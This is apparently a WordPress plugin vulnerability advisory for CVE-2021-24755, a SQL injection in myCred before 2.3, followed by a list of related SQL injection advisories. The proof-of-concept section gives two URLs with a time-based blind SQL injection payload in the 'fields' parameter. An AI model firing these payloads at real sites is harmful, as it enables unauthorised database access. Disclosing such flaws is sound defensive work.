myCred < 2.3 – Subscriber+ SQL Injection | CVE 2021-24755 | Plugin Vulnerabilities

Description

The plugin does not validate or escape the fields parameter before using it in a SQL statement, leading to an SQL injection exploitable by any authenticated user

Proof of Concept

(any authenticated user) https://example.com/wp-admin/users.php?page=mycred_default-history&fields=%28SELECT+5703+FROM+%28SELECT%28SLEEP%2810%29%29%29NXIL%29

(admin) https://example.com/wp-admin/admin.php?page=mycred&fields=%28SELECT+5703+FROM+%28SELECT%28SLEEP%2810%29%29%29NXIL%29

Affects Plugins

Fixed in 2.3

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

bl4derunner

Submitter

Anton Sarsadskikh

Verified

Yes

WPVDB ID

01419d03-54d6-413d-9a67-64c63c26d741

Timeline

Publicly Published

2021-11-01 (about 4 years ago)

Added

2021-11-01 (about 4 years ago)

Last Updated

2022-04-13 (about 3 years ago)

Other

Published

Title

Published

2023-09-26

Title

Welcart e-Commerce < 2.8.22 - Editor+ SQL Injection

Published

2025-01-17

Title

The Ultimate WordPress Toolkit – WP Extended < 3.0.13 - Unauthenticated SQL Injection via Login Attempts Module

Published

2014-09-19

Title

FB Gorilla - SQL Injection

Published

2023-04-07

Title

Spiffy Calendar < 4.9.2 - SQL Injection

Published

2021-07-23

Title

Cashtomer <= 1.0.0 - Authenticated SQL Injection